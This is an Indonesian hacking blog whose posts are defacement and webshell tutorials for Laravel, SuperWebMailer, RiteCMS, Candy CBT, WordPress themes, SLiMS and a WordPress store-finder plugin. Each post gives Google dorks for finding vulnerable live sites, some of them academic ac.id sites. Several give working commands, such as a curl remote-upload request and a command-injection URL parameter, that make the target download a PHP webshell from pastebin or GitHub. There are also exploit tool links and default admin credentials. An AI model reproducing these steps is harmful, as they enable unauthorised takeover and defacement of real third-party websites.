Welcome To Security Darknet

Selamat Datang Di Official Security Darknet
Home All posts

Selasa, 27 Oktober 2020

Laravel RCE APP_KEY

Comment

 Laravel RCE via Web Apps


2.Masukkan target (perhatikan penggunaan www,http,dan https)
3.Masukkan APP_KEY yang kalian dapat
4.Masukkan command (kalo saya seringkali dengan ls)
5.Klik exploit
Jika kalian ini melakukan backconnect kalian bisa menggunakan command disini

*note:
Tidak semua APP_KEY pada laravel yang rentan terhadap ini, bisa saja hanya karna perbedaan versi Laravel... 

Laravel RCE via terminal ( CLI )
download tools
php rce.php url=http://target.com/ method=1


Source : nakanosec
Contact : ncdream72@gmail.com

Unauthentication RCE SuperWebMailer

Comment

Unauthentication RCE SuperWebMailer


Dork :
inurl:/swm/defaultnewsletter.php

Tools :
https://github.com/Aryaalfahrezi010/RCE_SuperWebMailer

Shell:
https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php Pass IndoXploit


Oke pertama kita dorking dulu seperti biasa

Pilih web yg lo mau terserah
Nah Habis Itu lu hapus bagian defaultnewsletter.php

jadi (https://sitelu.com/swm)


habis itu lu install tools nya gblk

pakek python3 ya itu jangan lupa

python3 exploit.py -u https://sitelu/swm/
Nanti kalo vuln ada tulisannya kyak dibwh ini


Habis itu command rce nya

wget https://raw.githubusercontent.com/linuxsec/indoxploit-shell/master/shell-v3.php

Btw itu gua pakek mini shell karna shell tdi ga supp ama web w

Tinggal Akses dah
https://sitelo.com/swm/shell-v3.php

Contact : ncdream72@gmail.com

RiteCMS 2.2.1 - Authenticated Remote Code Execution

Comment


RiteCMS 2.2.1 - Authenticated Remote Code Execution

Vendor Homepage: http://ritecms.com/

Version: 2.2.1


Dork:

intext:"Powered By RiteCMS"


1- Go to following url. >> http://(HOST)/cms/

2- Default username and password is admin:admin. We must know login credentials.

3- Go "Filemanager" and press "Upload file" button.

4- Choose your php webshell script and upload it.

shell access?http://target.com/media/yourshell.php


Ref? Rite Cms


Contact : ncdream72@gmail.com

Deface PoC Computer Based Test RCE

Comment

 


Deface Poc Computer Based Test RCE


Dork:
"Support By Candy CBT"
"Support By Candy CBT"+"Login"
"Candy CBT"+"Login"
(Kembangin lagi gann...)

# Exploit #
-admin/ifm.php

jika saat di masukan Exploit nya malah redirect ke halaman admin/login.php

Maka itu tandanya vuln.

# Kode Rce #
curl http://targetkalian.com/admin/ifm.php -d 'api=remoteUpload&dir=&filename=D.php&method=curl&url=https://pastebin.com/raw/Vsaj9aS3'
Nama shell nya D.php bsa lu ganti sesuka hati lo

Akses Shell?
http://linktarget.com/files/namashell.php

contact : ncdream72@gmail.com

Deface WordPress Orange Themes

Comment

 


Deface WordPress Orange Themes


Dork : 

- inurl:/wp-content/themes/kernel-theme

- inurl:/wp-content/themes/bordeaux-theme

- inurl:/wp-content/themes/bulteno-theme

- inurl:/wp-content/themes/rayoflight-theme


Exploit :

/functions/upload-handler.php


Crsf Online :

https://blogpongo.com/csrf.php


Kalian Dorking Dulu di google

Pilih Salah Satu Web/Target Tambahin Exploitnya

Vuln?= Ada bacaan Error


Lalu Kalian Bukan Csrfnya

Masukkan Url

Contoh :

https://sitetarget.com/wp-content/themes/kernel-theme/functions/upload-handler.php

Post File : orange_themes


Kemudian Klik Submit Nah Terus Upload Shell/Sc Lu Kalo Sukses Nanti Keluar Nama File Kalian


Location File?:/wp-content/uploads/[tahun]/[bulan]/file lu

contoh :

https://sitetarget.com/wp-content/uploads/2020/02/sht.html


contact : ncdream72@gmail.com

Slims command injection Upload Shell

Comment


Slims command injection Upload Shell

Google Dorks :
- inurl:/index.php?p=show_detail&id= 
- "Detail Cantuman" site:ac.id 
- "Powered By Slims7" site:ac.id

Payload:
/lib/watermark/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg%20;wget%20https://raw.githubusercontent.com/backdoorhub/shell-backdoor-list/master/shell/php/mini.php;%20&phpThumbDebug=9

taruh payload dimana om?
terget.com/payload
target.com/path/payload

Akses Shell:
https/target.com/lib/watermark/mini.php

contact me :ncdream72@gmail.com

sumber:

SuperStoreFinder Wordpress Plugins Arbitrary File Upload

Comment

 


SuperStoreFinder Wordpress Plugins Arbitrary File Upload


Dork:

- SuperStoreFinder

- Inurl:superstorefinder-wp

- Inurl:superlogoshowcase-wp


SuperStoreFinder Exploit Upload Shell

https://pastebin.com/raw/pMuFWLLm

Usage:python filename.py http://google.com


Ref:

https://packetstormsecurity.com/files/159627/

Kocak Rdnm


still don't get it?

https://youtu.be/sPEJz6KvDbs


Contact : ncdream72@gmail.com

Langganan: Postingan (Atom)